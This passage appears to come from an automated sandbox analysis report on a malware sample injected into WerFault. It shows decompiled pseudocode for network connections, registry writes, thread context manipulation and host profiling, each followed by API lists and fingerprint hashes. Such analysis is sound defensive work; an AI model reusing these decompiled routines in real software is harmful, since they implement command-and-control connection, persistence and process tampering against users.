									goto L23;
								}
								_t93 = _v8;
								if(_t96 == 0) {
									L21:
									 *_a4 = _v12;
									 *0x289fd80(_t96);
									 *0x289f880(0);
									return _v20;
								}
								_v8 = _t55;
								do {
									_t67 = 0x20;
									_v16 = _t67;
									E028614DB(_t88,  &_v56, 0, _t67);
									 *0x289fd50( *((intOrPtr*)(_t96 + 0x18)), 0x10, 0,  &_v56,  &_v16);
									_t88 =  &_v56;
									if(E028619D6( &_v56) > 3) {
										 *0x289f6a0(_t93,  &_v56, 0x10);
										_v8 = _v8 + 4;
										 *_v8 = _t93;
										_t96 =  *((intOrPtr*)(_t96 + 0x1c));
										_t93 = _t93 + _v16 + 1;
									}
								} while (_t96 != 0);
								goto L21;
							} else {
								goto L13;
							}
							do {
								L13:
								_t49 =  *((intOrPtr*)(_t49 + 0x1c));
								_v12 = _v12 + 1;
							} while (_t49 != 0);
							goto L14;
						}
						_push(_t48);
						goto L30;
					} else {
						_t94 = E0286161B(0x104);
						if(_t94 == 0) {
							goto L31;
						}
						E028614DB(_t88, _t94, 0, 0x104);
						_t80 = 2;
						_push(8);
						_push(0);
						_v40 = _t80;
						_push(0);
						_push(0x103);
						_v36 = _v20;
						_push(_t94);
						_v38 = 0;
						_push(0x10);
						_push( &_v40);
						if( *0x289fd68() != 0) {
							goto L31;
						}
						_t85 = E0286161B(4);
						if(_t85 != 0) {
							 *_t85 = _t94;
							 *_a4 = 1;
							return _t85;
						}
						E028617E4(_t94);
						goto L31;
					}
				}
			}
























                        0x02885256
                        0x02885258
                        0x02885260
                        0x02885417
                        0x00000000
                        0x0288526f
                        0x0288526f
                        0x02885278
                        0x00000000
                        0x00000000
                        0x0288527f
                        0x02885285
                        0x0288528a
                        0x0288530c
                        0x0288530f
                        0x02885317
                        0x0288531f
                        0x02885322
                        0x02885326
                        0x02885332
                        0x02885340
                        0x02885349
                        0x0288534e
                        0x02885350
                        0x02885356
                        0x028853e3
                        0x028853e5
                        0x028853e8
                        0x028853e8
                        0x028853f1
                        0x028853f3
                        0x028853fb
                        0x028853fe
                        0x028853fe
                        0x02885406
                        0x0288540b
                        0x0288540b
                        0x02885410
                        0x02885411
                        0x02885411
                        0x00000000
                        0x02885411
                        0x0288535e
                        0x028853de
                        0x00000000
                        0x028853de
                        0x02885360
                        0x02885365
                        0x028853c0
                        0x028853c7
                        0x028853c9
                        0x028853d0
                        0x00000000
                        0x028853d6
                        0x02885367
                        0x0288536a
                        0x0288536c
                        0x0288536e
                        0x02885376
                        0x02885389
                        0x0288538f
                        0x0288539a
                        0x028853a3
                        0x028853ac
                        0x028853b0
                        0x028853b5
                        0x028853b8
                        0x028853b8
                        0x028853bc
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02885328
                        0x02885328
                        0x02885328
                        0x0288532b
                        0x0288532e
                        0x00000000
                        0x02885328
                        0x02885319
                        0x00000000
                        0x02885291
                        0x0288529c
                        0x028852a0
                        0x00000000
                        0x00000000
                        0x028852a9
                        0x028852b0
                        0x028852b1
                        0x028852b3
                        0x028852b4
                        0x028852bb
                        0x028852bc
                        0x028852c1
                        0x028852c6
                        0x028852c7
                        0x028852cb
                        0x028852d0
                        0x028852d9
                        0x00000000
                        0x00000000
                        0x028852e1
                        0x028852e8
                        0x028852f8
                        0x028852fa
                        0x00000000
                        0x028852fa
                        0x028852eb
                        0x00000000
                        0x028852eb
                        0x0288528a

                        APIs
                        • getaddrinfo.WS2_32(?,00000000,00000000,00000000,?,?,?,?,00000000), ref: 0288530F
                          • Part of subcall function 028617E4: RtlFreeHeap.NTDLL(00000000,00000000,00000000,?,0286175C,00000000,00000000,00000000,00000002,kernel32.dll,?,?,02866361), ref: 028617FD
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeHeapgetaddrinfo
                        • String ID:
                        • API String ID: 2189223984-0
                        • Opcode ID: 293a2c9cec6d15f9c7a00894b23c78b7751d19513c8c8b91ef4d8b65316654bf
                        • Instruction ID: 5ff19b8e5ec2d53fe2b9ca5dc287a6f4892ad061f480a13d4de75270122b0110
                        • Opcode Fuzzy Hash: 293a2c9cec6d15f9c7a00894b23c78b7751d19513c8c8b91ef4d8b65316654bf
                        • Instruction Fuzzy Hash: 5C514FBD900209AFCB10EFE8C8889BEB7B9BF45309B594866E605F7241D7749E418B61
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0286E6A4 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                        Download Yara Rule
                        C-Code - Quality: 34%
                        			E0286E6A4(intOrPtr _a4) {
				char _v524;
				signed int _v528;
				char _v1052;
				void* __edi;

				 *0x289f2e8 = E0286161B(0x2672);
				if( *0x289f2e8 == 0) {
					return 0;
				}
				_v528 = _v528 & 0x00000000;
				 *((short*)( *0x289f2e8)) = 0x2672;
				 *((short*)( *0x289f2e8 + 2)) = 0xf1f1;
				E02861807( &_v524, 0x208);
				E02861807( &_v1052, 0x208);
				E028651F6( *0x289f2e8,  &_v524, 0x103);
				 *0x289f7b8( &_v524,  &_v1052, 0x143); // executed
				_t76 =  &_v1052;
				if(E028619E8( &_v1052) < 6) {
					 *0x289f6a4( &_v1052,  &_v524, 0x143);
				}
				if(_a4 != 0) {
					E02861493(_t76,  *0x289f2e8, _a4, 0x2672);
				} else {
					 *0x289f6a4( *0x289f2e8 + 0x1646,  &_v1052, 0x143);
					 *0x289f6a4( *0x289f2e8 + 0x1b56,  *0x289f2e8 + 0x1646, 0x103);
					 *0x289fc84( *0x289f2e8 + 0x1b56);
					 *0x289fc78( *0x289f2e8 + 0x1b56);
					E0286E5F5();
				}
				_v528 =  *0x289fc64( *0x289f2e8 + 0x1646);
				if(_v528 != 0) {
					 *0x289f6a4( *0x289f2e8 + 0x2376, _v528, 0x3f);
				}
				 *0x289f6a4( *0x289f2e8 + 0x13be,  &_v1052, 0x143);
				 *((intOrPtr*)( *0x289f2e8 + 0x156)) = 0x289898e;
				 *((intOrPtr*)( *0x289f2e8 + 0x15a)) = E02861657(0xd56, _t76, 0x289098c, 0xd56);
				E02861807( *0x289f2e8 + 0x106, 0x18);
				 *0x289f8b0( *0x289f2e8 + 0x106, 0xfa0);
				return 1;
			}







                        0x0286e6b8
                        0x0286e6c4
                        0x00000000
                        0x0286e893
                        0x0286e6ca
                        0x0286e6dc
                        0x0286e6ea
                        0x0286e6fa
                        0x0286e70b
                        0x0286e71b
                        0x0286e733
                        0x0286e739
                        0x0286e747
                        0x0286e75c
                        0x0286e75c
                        0x0286e766
                        0x0286e7dd
                        0x0286e768
                        0x0286e77f
                        0x0286e7a0
                        0x0286e7b1
                        0x0286e7c2
                        0x0286e7c8
                        0x0286e7c8
                        0x0286e7f3
                        0x0286e800
                        0x0286e815
                        0x0286e815
                        0x0286e832
                        0x0286e83d
                        0x0286e861
                        0x0286e874
                        0x0286e889
                        0x00000000

                        APIs
                        • GetLongPathNameW.KERNEL32(?,?,00000143,00000103,?,00000208,?,00000208,00002672,028A0044), ref: 0286E733
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: LongNamePath
                        • String ID:
                        • API String ID: 82841172-0
                        • Opcode ID: 53fd6e3026a8e097314bd7956b7b445010c46c182c38ac5c00493740f5a291b4
                        • Instruction ID: 83bb5450d94e217c3cf95a67524e16f56d166d42389d4dfd51214095221adfc0
                        • Opcode Fuzzy Hash: 53fd6e3026a8e097314bd7956b7b445010c46c182c38ac5c00493740f5a291b4
                        • Instruction Fuzzy Hash: 7541907DD802089BDB14DFA8EC4DFD633B9AB14309F184961A748E76E1CB3485A0CF58
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02865446 Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                        Download Yara Rule
                        C-Code - Quality: 25%
                        			E02865446(void* __ecx) {
				char _v6;
				signed short _v12;
				intOrPtr _v152;
				intOrPtr _v156;
				char _v160;
				short _v196;
				signed int _t33;
				void* _t37;
				void* _t40;
				signed int _t42;

				E028614DB(__ecx,  &_v160, 0, 0x9c);
				E028614DB(__ecx,  &_v196, 0, 0x24);
				_v160 = 0x9c;
				 *0x289f800( &_v196); // executed
				 *0x289f80c( &_v160);
				_t33 = 2;
				if(_v6 == _t33 || _v6 == 3) {
					if(_v156 != 5) {
						if(_v156 != 6) {
							goto L23;
						}
						if(_v152 == 0) {
							goto L25;
						}
						if(_v152 != 1) {
							if(_v152 != _t33) {
								goto L23;
							}
							_t33 = 0x2000;
							goto L25;
						}
						_push(4);
						goto L24;
					}
					if(_v152 != _t33) {
						goto L23;
					}
					_t33 = 1;
					goto L25;
				} else {
					if(_v6 != 1) {
						L23:
						_push(8);
						L24:
						_pop(_t33);
						L25:
						if(_v196 == 9) {
							L27:
							_t42 = 0x200;
							L28:
							_t37 = (_v12 & 0x0000ffff) - 1;
							if(_t37 == 0) {
								_t42 = _t42 | 0x00000400;
							} else {
								_t40 = _t37 - 1;
								if(_t40 == 0) {
									_t42 = _t42 | 0x00000800;
								} else {
									if(_t40 == 1) {
										_t42 = _t42 | 0x00001000;
									}
								}
							}
							 *0x289fdc8 = _t33 | _t42;
							return _t33;
						}
						_t42 = 0x100;
						if(_v196 != 6) {
							goto L28;
						}
						goto L27;
					}
					if(_v156 != 5) {
						if(_v156 != 6) {
							goto L23;
						}
						if(_v152 != 0) {
							if(_v152 != 1) {
								if(_v152 != _t33) {
									goto L23;
								}
								_push(0x10);
								goto L24;
							}
							_push(0x20);
							goto L24;
						}
						_push(0x40);
						goto L24;
					}
					if(_v152 == 1 || _v152 == _t33) {
						_t33 = 0x80;
						goto L25;
					} else {
						goto L23;
					}
				}
			}













                        0x0286545d
                        0x0286546d
                        0x02865479
                        0x02865483
                        0x02865490
                        0x02865498
                        0x0286549c
                        0x02865505
                        0x0286551b
                        0x00000000
                        0x00000000
                        0x02865524
                        0x00000000
                        0x00000000
                        0x0286552d
                        0x02865539
                        0x00000000
                        0x00000000
                        0x0286553b
                        0x00000000
                        0x0286553b
                        0x0286552f
                        0x00000000
                        0x0286552f
                        0x0286550d
                        0x00000000
                        0x00000000
                        0x02865511
                        0x00000000
                        0x028654a4
                        0x028654a8
                        0x02865542
                        0x02865542
                        0x02865544
                        0x02865544
                        0x02865545
                        0x0286554d
                        0x0286555e
                        0x0286555e
                        0x02865563
                        0x02865567
                        0x02865568
                        0x02865580
                        0x0286556a
                        0x0286556a
                        0x0286556b
                        0x02865578
                        0x0286556d
                        0x0286556e
                        0x02865570
                        0x02865570
                        0x0286556e
                        0x0286556b
                        0x0286558a
                        0x02865591
                        0x02865591
                        0x02865557
                        0x0286555c
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0286555c
                        0x028654b5
                        0x028654d6
                        0x00000000
                        0x00000000
                        0x028654df
                        0x028654ec
                        0x028654f8
                        0x00000000
                        0x00000000
                        0x028654fa
                        0x00000000
                        0x028654fa
                        0x028654ee
                        0x00000000
                        0x028654ee
                        0x028654e1
                        0x00000000
                        0x028654e1
                        0x028654be
                        0x028654c8
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x028654be

                        APIs
                        • GetNativeSystemInfo.KERNEL32(?,?,00000000,00000024,?,00000000,0000009C), ref: 02865483
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: InfoNativeSystem
                        • String ID:
                        • API String ID: 1721193555-0
                        • Opcode ID: caba29d19238c9bde5db4454b783724f46c143458e5e3197da9c6a64fa728839
                        • Instruction ID: a3699ac9ad464ec5f9180db71d0d9370b610f8b0c52d76ba8bbd04c8abf7b48b
                        • Opcode Fuzzy Hash: caba29d19238c9bde5db4454b783724f46c143458e5e3197da9c6a64fa728839
                        • Instruction Fuzzy Hash: B431107CD55228DAEF749664CC0EBB872B6BB05309F8480E6D24DE54C1D77C46C5CB11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0287A99E Relevance: 1.6, APIs: 1, Instructions: 54networkCOMMON
                        Download Yara Rule
                        C-Code - Quality: 47%
                        			E0287A99E(void* __ecx) {
				char _v8;
				void* _v12;
				void* _t13;
				char* _t20;
				short _t24;
				void* _t27;

				_push(__ecx);
				_push(__ecx);
				_t27 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x64)) == 0xc0) {
					if( *((intOrPtr*)(__ecx + 0x124)) == 0) {
						goto L1;
					} else {
						_t24 =  *(__ecx + 0x78) & 0x0000ffff;
						_t20 = __ecx + 0x8a;
						_v8 = 1;
						_v12 = 0x1234;
						if(E02866E47(_t20) == 1) {
							L7:
							_t13 = 0;
						} else {
							if(_t24 == 0) {
								_t24 = 0x50;
							}
							 *0x289fbc4( *(_t27 + 0x124), 0x4d,  &_v8, 4);
							_t13 = InternetConnectA( *(_t27 + 0x124), _t20, _t24, 0, 0, 3, 0,  &_v12); // executed
							if(_t13 != 0) {
								 *(_t27 + 0x128) = _t13;
							} else {
								goto L7;
							}
						}
					}
				} else {
					L1:
					_t13 = 0;
				}
				return _t13;
			}









                        0x0287a9a1
                        0x0287a9a2
                        0x0287a9a4
                        0x0287a9af
                        0x0287a9bc
                        0x00000000
                        0x0287a9be
                        0x0287a9c0
                        0x0287a9c4
                        0x0287a9cb
                        0x0287a9d2
                        0x0287a9e0
                        0x0287aa1b
                        0x0287aa1b
                        0x0287a9e2
                        0x0287a9e5
                        0x0287a9e9
                        0x0287a9e9
                        0x0287a9f8
                        0x0287aa11
                        0x0287aa19
                        0x0287aa1f
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0287aa19
                        0x0287aa26
                        0x0287a9b1
                        0x0287a9b1
                        0x0287a9b1
                        0x0287a9b1
                        0x0287aa29

                        APIs
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00001234,?,02870BFD,?,000000C0), ref: 0287AA11
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: ConnectInternet
                        • String ID:
                        • API String ID: 3050416762-0
                        • Opcode ID: 577bb747f3ec2f77ee46aa1d9637d97cf2e734b791ba223405db8bd4f5b11e99
                        • Instruction ID: 6906af972eec0f3ecee0dc5f1c7358e83d860c5d9dfb98d6c59d31b98d3664c6
                        • Opcode Fuzzy Hash: 577bb747f3ec2f77ee46aa1d9637d97cf2e734b791ba223405db8bd4f5b11e99
                        • Instruction Fuzzy Hash: 0C0192BA240605BEEB248B64CD45FFBB6FCEB44709F00046AF69AD2190E3709A64C720
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02862A42 Relevance: 1.6, APIs: 1, Instructions: 51registryCOMMON
                        Download Yara Rule
                        C-Code - Quality: 29%
                        			E02862A42(void* __esi, char* _a4, intOrPtr _a8) {
				char _v8;
				void* _v12;
				int _v16;
				long _t18;
				void* _t21;
				void* _t30;

				_v12 = 0;
				_v16 = 0;
				if(_a4 == 0 || E028619D6(_a4) == 0) {
					L4:
					return 0;
				} else {
					_v8 = 0;
					_t18 = RegCreateKeyExA(0x80000001, _a4, 0, 0, 0, 0x101, 0,  &_v12, 0); // executed
					if(_t18 != 0) {
						goto L4;
					}
					_t21 =  *0x289fafc(_v12, _a8, 0, 0,  &_v8,  &_v16, __esi);
					_t30 = _t21;
					 *0x289fb1c(_v12);
					_t13 = _t30 - 0xea; // -234
					asm("sbb eax, eax");
					return  !( ~_t13) & _v16;
				}
			}









                        0x02862a4b
                        0x02862a4e
                        0x02862a54
                        0x02862ab9
                        0x00000000
                        0x02862a62
                        0x02862a73
                        0x02862a7b
                        0x02862a83
                        0x00000000
                        0x00000000
                        0x02862a96
                        0x02862a9f
                        0x02862aa1
                        0x02862aa7
                        0x02862aaf
                        0x00000000
                        0x02862ab6

                        APIs
                        • RegCreateKeyExA.KERNEL32(80000001,?,00000000,00000000,00000000,00000101,00000000,?,00000000,00000002,02862EA6,?,00000000), ref: 02862A7B
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: 90c4bd3d93082f415d6f7b824b824d4d694155a2ecaf06a3a4219bdd15e63435
                        • Instruction ID: 4e87dc7aeeca4071a64d2d3299f4671c4e5ede48042beeb9f374a6e69a549e22
                        • Opcode Fuzzy Hash: 90c4bd3d93082f415d6f7b824b824d4d694155a2ecaf06a3a4219bdd15e63435
                        • Instruction Fuzzy Hash: DF0129BEA4010DBFEB119FE5DC84DEEBBADEB14349F1084A5B905E2140D6719A64CB60
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028629BC Relevance: 1.6, APIs: 1, Instructions: 51registryCOMMON
                        Download Yara Rule
                        APIs
                        • RegCloseKey.KERNEL32(80000001), ref: 02862A28
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: Close
                        • String ID:
                        • API String ID: 3535843008-0
                        • Opcode ID: e4319b482016b7e1b1a83f6baa3db7b67b1d2ee0c8d74174e6737a4d365f0a22
                        • Instruction ID: 7c5b3dc64d9786abda35d73bd804161bad268d63b48cd84aae4a1948efae2b56
                        • Opcode Fuzzy Hash: e4319b482016b7e1b1a83f6baa3db7b67b1d2ee0c8d74174e6737a4d365f0a22
                        • Instruction Fuzzy Hash: D8113979A01119FBDF21CFA0D8489EEBBBAAB04705F04C5A2FD05E2058D3B58A30DB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02865D65 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                        Download Yara Rule
                        C-Code - Quality: 82%
                        			E02865D65(intOrPtr __ebx, void* __ecx, void* _a4) {
				long _v8;
				intOrPtr _v548;
				char _v724;
				void* _t13;
				void* _t16;
				void* _t20;
				void* _t26;

				_t24 = __ecx;
				if(__ebx != 0) {
					_v8 = _v8 & 0x00000000;
					E028614DB(__ecx,  &_v724, 0, 0x2cc);
					_t13 = CreateThread(0, 0,  *0x289f83c, _a4, 4,  &_v8); // executed
					_t26 = _t13;
					if(_t26 == 0) {
						L7:
						return _t26;
					}
					_v724 = 0x10007;
					_t16 = L02887534(_t26,  &_v724); // executed
					if(_t16 == 0) {
						L6:
						L02887454(_t26);
						 *0x289f824(_t26);
						_t26 = 0;
						goto L7;
					}
					_v548 = __ebx;
					_t20 = L028874C3(_t26,  &_v724); // executed
					if(_t20 == 0) {
						goto L6;
					}
					L02887364(_t24, _t26); // executed
					goto L7;
				}
				return 0;
			}










                        0x02865d65
                        0x02865d70
                        0x02865d79
                        0x02865d8c
                        0x02865da4
                        0x02865daa
                        0x02865dae
                        0x02865df9
                        0x00000000
                        0x02865dfb
                        0x02865db8
                        0x02865dc2
                        0x02865dc9
                        0x02865dea
                        0x02865deb
                        0x02865df1
                        0x02865df7
                        0x00000000
                        0x02865df7
                        0x02865dd3
                        0x02865dd9
                        0x02865de0
                        0x00000000
                        0x00000000
                        0x02865de3
                        0x00000000
                        0x02865de3
                        0x00000000

                        APIs
                        • CreateThread.KERNEL32(00000000,00000000,0286D48A,00000004,00000000,?,00000000,000002CC,00000208), ref: 02865DA4
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateThread
                        • String ID:
                        • API String ID: 2422867632-0
                        • Opcode ID: 3a4cd5943cb5172780cd05a70b00ee6506174af791b39a10244dee559a6512da
                        • Instruction ID: 181b674a2d50c0189d6ddcd97c5bbc9bdc0b6d6ef364377de2591e7758b1e654
                        • Opcode Fuzzy Hash: 3a4cd5943cb5172780cd05a70b00ee6506174af791b39a10244dee559a6512da
                        • Instruction Fuzzy Hash: CD01527DD0122566D720BB649C4CFFEB6BCAF19744F5440A1EB08F11D1D778AA448AA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02862AC0 Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON
                        Download Yara Rule
                        C-Code - Quality: 59%
                        			E02862AC0(void* __ecx, void* _a4, char* _a8, intOrPtr _a12, char _a16) {
				void* _v8;
				void* _t13;
				long _t17;

				_push(__ecx);
				if(_a8 == 0) {
					L4:
					_t13 = 0;
				} else {
					_v8 = 0;
					if(E028619D6(_a8) == 0) {
						goto L4;
					} else {
						_t17 = RegCreateKeyExA(_a4, _a8, 0, 0, 0, 0x102, 0,  &_v8, 0); // executed
						if(_t17 != 0) {
							goto L4;
						} else {
							L0288776E(_v8, _a12, 0, 4,  &_a16, 4); // executed
							 *0x289fb1c(_v8);
							_t13 = 1;
						}
					}
				}
				return _t13;
			}






                        0x02862ac3
                        0x02862aca
                        0x02862b20
                        0x02862b20
                        0x02862acc
                        0x02862ad2
                        0x02862adf
                        0x00000000
                        0x02862ae1
                        0x02862af5
                        0x02862afd
                        0x00000000
                        0x02862aff
                        0x02862b0e
                        0x02862b16
                        0x02862b1c
                        0x02862b1c
                        0x02862afd
                        0x02862adf
                        0x02862b24

                        APIs
                        • RegCreateKeyExA.KERNEL32(?,?,00000000,00000000,00000000,00000102,00000000,00000003,00000000,00000001,?,?,02863F81,80000001,?,2500), ref: 02862AF5
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: 567dc4ad6bd8a3481cf5e6bb8911c04703792ef5ca1cc933b4d9a5bc21375091
                        • Instruction ID: d964a6d20f5c639031b9a173fcba0918aa6f6479b35f627a9845546b4d81c483
                        • Opcode Fuzzy Hash: 567dc4ad6bd8a3481cf5e6bb8911c04703792ef5ca1cc933b4d9a5bc21375091
                        • Instruction Fuzzy Hash: 4A012479602229FACF119E61DD0AEEF7BADEF15754F004451BE08E6194D3709A20DBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0288552B Relevance: 1.5, APIs: 1, Instructions: 38networkCOMMON
                        Download Yara Rule
                        C-Code - Quality: 16%
                        			E0288552B() {
				char _v5;
				char _v6;
				char _v7;
				signed int _v8;
				char _v264;
				int _t16;
				signed int _t18;
				void* _t20;
				intOrPtr* _t23;

				_v8 = _v8 & 0x00000000;
				_t16 = gethostname( &_v264, 0xff); // executed
				if(_t16 != 0xffffffff) {
					_t18 =  *0x289fd84( &_v264);
					if(_t18 != 0xffffffff) {
						L5:
						 *0x28a0664 = _t18;
						 *0x28a0668 = _t18;
						return _t18;
					} else {
						_t20 =  *0x289fd70( &_v264);
						if(_t20 == 0) {
							goto L1;
						} else {
							_t23 =  *((intOrPtr*)( *((intOrPtr*)(_t20 + 0xc))));
							_v8 =  *_t23;
							_v7 =  *((intOrPtr*)(_t23 + 1));
							_v6 =  *((intOrPtr*)(_t23 + 2));
							_v5 =  *((intOrPtr*)(_t23 + 3));
							_t18 = _v8;
							goto L5;
						}
					}
				} else {
					L1:
					return 0;
				}
			}












                        0x02885534
                        0x02885544
                        0x0288554d
                        0x0288555a
                        0x02885563
                        0x02885595
                        0x02885595
                        0x0288559a
                        0x028855a0
                        0x02885565
                        0x0288556c
                        0x02885574
                        0x00000000
                        0x02885576
                        0x02885579
                        0x0288557d
                        0x02885583
                        0x0288558c
                        0x0288558f
                        0x02885592
                        0x00000000
                        0x02885592
                        0x02885574
                        0x0288554f
                        0x0288554f
                        0x02885552
                        0x02885552

                        APIs
                        • gethostname.WS2_32(?,000000FF), ref: 02885544
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: gethostname
                        • String ID:
                        • API String ID: 144339138-0
                        • Opcode ID: f2b0761c5b76095758997e7ebfd11c8ec81c4c714daf70aac5407d3a1aed900f
                        • Instruction ID: 4637988af9120933a6fd41bcac4bcd4df14a92a7dc3afe95fc8039f74f6de213
                        • Opcode Fuzzy Hash: f2b0761c5b76095758997e7ebfd11c8ec81c4c714daf70aac5407d3a1aed900f
                        • Instruction Fuzzy Hash: 0C01DF7DC042889FCB01CB789588AD9BBF46F29310F1886D0D285D32D2D734DA08DB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0288575C Relevance: 1.5, APIs: 1, Instructions: 32networkCOMMON
                        Download Yara Rule
                        C-Code - Quality: 16%
                        			E0288575C(intOrPtr _a4, intOrPtr _a8) {
				void* _t6;

				if(_a4 == 0 || _a8 == 0) {
					_t6 = 0xfffffffe;
					return _t6;
				} else {
					 *0x289fd34(2, 1, 0); // executed
					if(0 == 0xffffffff) {
						L5:
						return 0;
					}
					if(E0288570A(_a4, 0, _a8) == 0) {
						return 0;
					}
					E02885655(_t10, 0);
					goto L5;
				}
			}




                        0x02885765
                        0x0288579f
                        0x00000000
                        0x0288576d
                        0x02885772
                        0x0288577d
                        0x02885795
                        0x00000000
                        0x02885795
                        0x0288578d
                        0x00000000
                        0x02885799
                        0x02885790
                        0x00000000
                        0x02885790

                        APIs
                        • socket.WS2_32(00000002,00000001,00000000,00000000,?,02870D92,00000000,00000050,?,LCT,00000000), ref: 02885772
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: socket
                        • String ID:
                        • API String ID: 98920635-0
                        • Opcode ID: 90340afc90048efb6279142c82d889c8d2a7b38e453251e84b22dd27c7f7cdcf
                        • Instruction ID: b52f009c4a8a6f8aa5a2135aaa5944382a151fe9c1e8b95bf296df58bc57dbef
                        • Opcode Fuzzy Hash: 90340afc90048efb6279142c82d889c8d2a7b38e453251e84b22dd27c7f7cdcf
                        • Instruction Fuzzy Hash: 9BF0E53D104224FADB3179788C449AA73998B04364F86C631BD2CDA0C0E67CC94087F1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02862B90 Relevance: 1.5, APIs: 1, Instructions: 26registryCOMMON
                        Download Yara Rule
                        C-Code - Quality: 37%
